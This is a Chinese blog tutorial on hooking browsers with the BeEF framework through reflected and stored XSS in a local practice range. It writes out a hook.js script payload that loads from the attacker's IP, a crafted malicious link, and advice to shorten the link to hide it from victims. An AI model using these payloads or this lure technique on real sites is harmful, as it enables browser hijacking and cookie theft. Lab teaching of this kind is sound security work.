Web安全 XSS漏洞的利用(Beef工具)(点击链接就被黑的技术.)

已于 2023-11-14 13:35:52 修改
阅读量4.1k 收藏 61
点赞数 34
分类专栏: # 安全测试工具领域. # 跨站脚本(XSS)漏洞 领域. 文章标签: web安全 xss 安全
于 2022-03-18 14:57:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54977781/article/details/123555545
版权

XSS漏洞的 概括:

XSS又叫CSS(Cross Site Script)跨站脚本攻击,指的是攻击者在Web页面,插入恶意JS代码,当用户浏览该页之时,嵌入其中JS代码就会被执行,从而达到攻击的目的.(包含:收集用户的Cookie,添加账号,修改密码,提高用户权限等等.

目录

      XSS漏洞的 概括:

XSS漏洞的危害:

第一步:安装 Beef.

1.首先输入命令进行安装.

发现安装不了,但是有提示.

2.根据提示进行输入命令.

3.再输入命令进行安装.

4.直接运行 Beef-xss.

5.访问 http://(IP地址):3000/ui/panel

第二步:Beef工具利用.

1.启动 Beef 工具.

2.利用 生成的链接 写入存在有 XSS漏洞 的地方.

反射型的利用:

(1) 找到存在 XSS漏洞 的地方.

(2)把生成的新链接 复制 下来.(写入 XSS漏洞代码 的链接)

(3)隐藏链接 (由于链接过长容易被发现.)

(4)把短链接发给靶机访问.(但靶机访问就会受到 XSS漏洞 的攻击.)

(5)在 kali 里访问 和 登录 Beef 工具.

存储型的利用:

(1) 找到存在 XSS漏洞 的地方.

(2)用 靶机 去访问这个留言板.(当靶机访问留言页面的时候,就已经遭到到我们 XSS漏洞 的攻击了.)

(3)在 kali 里访问 和 登录 Beef 工具.

免责声明:

严禁利用本文章中所提到的工具和技术进行非法攻击,否则后果自负,上传者不承担任何责任。

XSS漏洞的危害:

(1)窃取用户Cookie,如果用户Cookie被窃取,攻击者可以不通过密码,而直接登录用户账户.
(2)使用XMLHttpRequest构造模拟用户请求操作.
(3)XSS钓鱼攻击.
(4)用户PC信息探测收集器.
(5)XSS蠕虫攻击等.

测试机:

kali    链接:https://pan.baidu.com/s/1ZKvP-CFYcmhFw3ol5ul4bg 
          提取码:tian 

靶机:

win 10(IP地址:192.168.1.102

靶场:

本地自己搭建的 Pikachu(皮卡丘)靶场:安装在win XP(IP地址:192.168.1.104

Pikachu(皮卡丘)靶场搭建链接:Web安全 Pikachu(皮卡丘)靶场搭建._半个西瓜.的博客-CSDN博客

第一步:安装 Beef.

1.首先输入命令进行安装.

apt-get install beef-xss

发现安装不了,但是有提示.

2.根据提示进行输入命令.

apt-get update

3.再输入命令进行安装.

apt-get install beef-xss

4.直接运行 Beef-xss.

beef-xss

标记处的意思是叫你 修改密码(密码输入时不可见.),本身默认的密码和账号分别为 beef 和 beef

5.访问 http://(IP地址):3000/ui/panel

http://127.0.0.1:3000/ui/panel

账号:beef        密码:是你在上面输入的密码(这里我输入的是:root)

成功进入的页面.

第二步:Beef工具利用.

1.启动 Beef 工具.

beef-xss

2.利用 生成的链接 写入存在有 XSS漏洞 的地方.

 命令概括:<script src="http://(自己本地的IP地址):3000/hook.js"></script>

<script src="http://192.168.1.105:3000/hook.js"></script>

反射型的利用:

(1) 找到存在 XSS漏洞 的地方.

写入的命令:

<script src="http://192.168.1.105:3000/hook.js"></script>

(2)把生成的新链接 复制 下来.(写入 XSS漏洞代码 的链接)

http://192.168.1.104:801/pikachu/vul/xss/xss_reflected_get.php?message=%3Cscript+src%3D%22http%3A%2F%2F192.168.1.105%3A3000%2Fhook.js%22%3E%3C%2Fscript%3E&submit=submit

(3)隐藏链接 (由于链接过长容易被发现.

利用工具生成为短链接:45短网址

(4)把短链接发给靶机访问.(但靶机访问就会受到 XSS漏洞 的攻击.

http://wlw3q.cn/bXjcN

(5)在 kali 里访问 和 登录 Beef 工具.

http://127.0.0.1:3000/ui/panel

存储型的利用:

(1) 找到存在 XSS漏洞 的地方.

写入的命令:

<script src="http://192.168.1.105:3000/hook.js"></script>

(2)用 靶机 去访问这个留言板.(当靶机访问留言页面的时候,就已经遭到到我们 XSS漏洞 的攻击了.)

靶机访问网站的留言页面:

(3)kali 里访问 和 登录 Beef 工具.

http://127.0.0.1:3000/ui/panel

   

参考链接:kali安装beef - phyger - 博客园

参考链接:XSS漏洞原理和利用_VictorZhang-CSDN博客_xss漏洞原理

半个西瓜.
关注
  • 34
    点赞
  • 61
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
安全(三):XSS攻击(beef 使用)
天威一号
11-17 940
1、 2、 3、
web XSS漏洞
qq_46258964的博客
12-21 1356
XSS简介 跨站脚本(cross site script)为了避免和css混淆,所以简称为XSSXSS是出现在web中的安全漏洞,也是主流漏洞之一,XSS是指恶意攻击者利用网站没有对用户提交的数据进行转义处理或者过滤不足的缺点,添加代码嵌入到web页面中,使用户访问会执行相应的嵌入代码 攻击危害 盗取各种用户账号 盗取用户cookie资料,冒充用户身份进入网站 劫持用户会话,执行任意操作 刷流量,执行弹窗广告 转播蠕虫病毒 控制企业数据,包括读取、篡改、添加、删除企业敏感数据的能力 构造XSS脚本 弹框
beef工具-01】神器beef的安装与简介
m0_64378913的博客
06-01 7497
目录1 beef概述1 beef简介1.2 beef2 beef安装3 beef的重要网址4 简单测试5 总结参考文章 1 beef概述 1 beef简介 BeEF 是浏览器开发框架的缩写。 它是一款专注于网络浏览器的渗透测试工具。 随着人们越来越担心针对客户端(包括移动客户端)的网络攻击,BeEF 允许专业的渗透测试人员通过使用客户端攻击向量来评估目标环境的实际安全状况。 与其他安全框架不同,BeEF 超越了加固的网络边界和客户端系统,并在一扇敞开的门的上下文中检查可利用性:Web 浏览器。
揭秘最为知名的工具之一:BeEF(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Python_0011的博客
07-18 855
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞工具、SQLmap、NMAP、BP、MSF…技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。根据需要修改默认配置,如用户名和密码。
XSS漏洞测试工具
02-10
XSS是一种非常常见的漏洞类型,它的影响非常的广泛并且很容易的就能被检测到。 攻击者可以在未经验证的情况下,将不受信任的JavaScript片段插入到你的应用程序中,然后这个JavaScript将被访问目标站点的受害者执行
XSS漏洞自动化攻击工具XSSer
weixin_34018169的博客
08-30 983
2019独角兽企业重金招聘Python工程师标准>>> ...
TamperIE - 一个小巧的XSS漏洞检测辅助工具
热门推荐
软件质量优化
01-21 1万+
有些开发人员喜欢在客户端进行用户输入的检查,这种方法其实是不安全的,因为跨站脚本攻击可以绕过客户端输入界面,利用一些工具来修改提交到服务器的字符串,从而达到跨站脚本攻击的目的。TamperIE就是此类的小工具之一(www.bayden.com)TamperIE安装后以插件的方式加载到IE浏览器中,监视IE浏览器与服务器之间的HTTP通信,截获提交到服务器的HTTP语句,修改其中的数
XSSer:自动化XSS漏洞检测及利用工具
09-04
XSSer:自动化XSS漏洞检测及利用工具 跨站点“Scripter”(又名XSSer)是一个自动化框架,用于检测、利用以及报告基于Web应用程序 中的XSS漏洞。 它包含多个尝试绕过某些过滤器的选项,以及各种特殊的代码注入技术
这个工具可以帮你自动化XSS漏洞的发现和利用XSS-Exploitation-Tool:一个强大的XSS漏洞扫描与利用工具
jklbnm12的博客
07-22 2561
功能说明获取关于目标浏览器的技术数据可以获取目标浏览器的类型、版本、操作系统、语言等信息获取目标用户的地理坐标位置可以获取目标用户的经纬度、国家、城市等信息获取已挂起/已访问的网页快照可以获取目标用户访问过或者正在访问的网页的截图获取已挂起/已访问的网页源代码可以获取目标用户访问过或者正在访问的网页的源代码提取表单输入字段数据可以获取目标用户在表单中输入过或者正在输入的数据获取Cookie数据可以获取目标用户在浏览器中存储的Cookie数据键盘记录功能。
Web应用安全XSS通过JavaScript攻击(实验).docx
06-20
1. 在一个已知存在XSS漏洞的站点(如pikachu)上,利用XSS留言板,插入包含Beef链接的JavaScript脚本`地址:3000/hook.js></script>`。 2. 当其他用户访问含有恶意脚本的页面时,Beef-xss会捕获到连接,并能控制用户...
XSS跨站脚本攻击理论和实战 XSS构造脚本+手动XSS+利用BEef自动化XSS(网络安全学习13)
Until_U的博客
07-06 5701
CONTENTS 1 XSS简介 2 构造XSS脚本 2.1 常用的HTML标签 2.2 常用java script方法 2.3 构造XSS脚本 3 反射型XSS 4 存储型XSS 5 kali渗透获取cookie 6 自动化XSS 6.1 BEef简介 6.2 BEef的主要功能 6.3 BEef实战 1 XSS简介 (1)XSS相关概念 跨站脚本( cross site script )为了避免与样式css混淆,所以简称为XSSXSS是一种经常出现...
XSS漏洞检测工具
06-11
XSS漏洞检测工具,Linux下安装使用,很简单 Examples of usage: ============================== * Simple injection from URL: $ python XSSer.py -u "http://host.com" ------------------- * Simple injection from File, with tor proxy and spoofing HTTP Referer headers: $ python XSSer.py -i "file.txt" --proxy "http://127.0.0.1:8118" --referer "666.666.666.666" ------------------- * Multiple injections from URL, with automatic payloading, using tor proxy, injecting on payloads character encoding in "Hexadecimal", with verbose output and saving results to file (XSSlist.dat): $ python XSSer.py -u "http://host.com" --proxy "http://127.0.0.1:8118" --auto --Hex --verbose -w ------------------- * Multiple injections from URL, with automatic payloading, using caracter encoding mutations (first, change payload to hexadecimal; second, change to StringFromCharCode the first encoding; third, reencode to Hexadecimal the second encoding), with HTTP User-Agent spoofed, changing timeout to "20" and using multithreads (5 threads): $ python XSSer.py -u "http://host.com" --auto --Cem "Hex,Str,Hex" --user-agent "XSSer!!" --timeout "20" --threads "5"
xss漏洞扫描工具
03-12
它可以分析使用HTTP和HTTPS协议进行通信的应用程序,可以用最简单地形式记录它观察的会话,并允许操作人员以各种方 式观查会话。如果你需要观察一个基于HTTP(S)应用程序的运行状态,可以满足你这种需要。不管是帮助开发人员调试其它方面 的难题,还是允许安全专业人员识别漏洞,它都是一款不错的工具
SQL注射与XSS攻击的牛B工具
04-14
针对SQL注入与XSS攻击的前期扫描工具,能够全面的对你网站进行透彻详细的扫描,它能扫描出远远比你能想想的多的多的链接地址,功能很强大,无毒,可以完一完,但不得用于恶意攻击,后果自负!
xss与cookie漏洞验证工具
08-25
xss与cookie漏洞验证工具
XSS漏洞
04-05
NULL 博文链接:https://0001111.iteye.com/blog/1440168
WEB漏洞篇——跨站脚本攻击(XSS
m0_56634355的博客
06-05 4719
目录一、XSS简述1.1 什么是XSS1.2 XSS分类1.3 DOM XSS漏洞演示二、XSS攻击进阶2.1 初探XSS Payload2.2 强大的XSS Payload2.3 XSS攻击平台2.4 XSS Worm2.5 XSS构造技巧2.6 反射型XSS利用技巧-回旋镖2.7 Flash XSS2.8 JavaScript开放框架三、XSS防御3.1 HttpOnly3.2 输入检查3.3 输出检查3.4 正确地防御XSS3.5 处理富文本3.6 防御DOM Based XSS四、总结XSS攻击是指
Linux最新网络安全:Kali Linux 进行SQL注入与XSS漏洞利用(1),2024年最新字节跳动算法工程师总结
2301_77033340的博客
05-06 650
(5)获取当前数据库名称(6)获取当前数据库中所有表的名称(7)获取当前数据库指定的表的字段名(8)获取指定库指定表指定字段的值。
牛B装备 XSS 漏洞利用工具[使用教程]
weixin_30412577的博客
02-14 263
牛B装备 XSS 漏洞利用工具[使用教程] 牛B装备 XSS 漏洞利用工具[使用教程] 作者:佚名 来源:本站整理 发布时间:2010-05-02 23:42:50 没人爱的猪 DJlyr工具下载地址:http://www.7747.net/Soft/200912/16400.html图片: 在工具中,最让人头疼的就是盗取cookie这个版面.绝对有许多人...
web安全之kali-xss-beef剑心哥哥
12-24
Kali Linux是一种用于网络安全测试和渗透测试的操作系统,它具有强大的工具和功能,可以用于检测和解决网站的安全漏洞XSS(跨站脚本攻击)是一种常见的网络安全漏洞,可以通过在网页中插入恶意脚本来获取用户的敏感信息。 BeEF(浏览器控制框架)是一个用于检测和利用Web浏览器漏洞工具,可以用于执行XSS攻击,获取用户浏览器的信息和控制用户的浏览器。在Kali Linux中结合使用XSSBeEF可以实现对网站的全面安全检测和攻击。 “剑心哥哥”可能是指对网络安全有一定研究和实践经验的人,因为这些工具都需要一定的技术和知识才能使用。结合使用Kali Linux、XSSBeEF可以帮助“剑心哥哥”对网站进行全面的安全检测,并了解和利用XSS漏洞来展示其危害性。同时,也需要“剑心哥哥”具备一定的伦理和法律意识,不能利用这些工具进行非法攻击和侵犯他人隐私。通过学习和实践网络安全相关知识,我们可以更好地保护自己的网络安全,并为网络安全事业做出贡献。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

半个西瓜.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值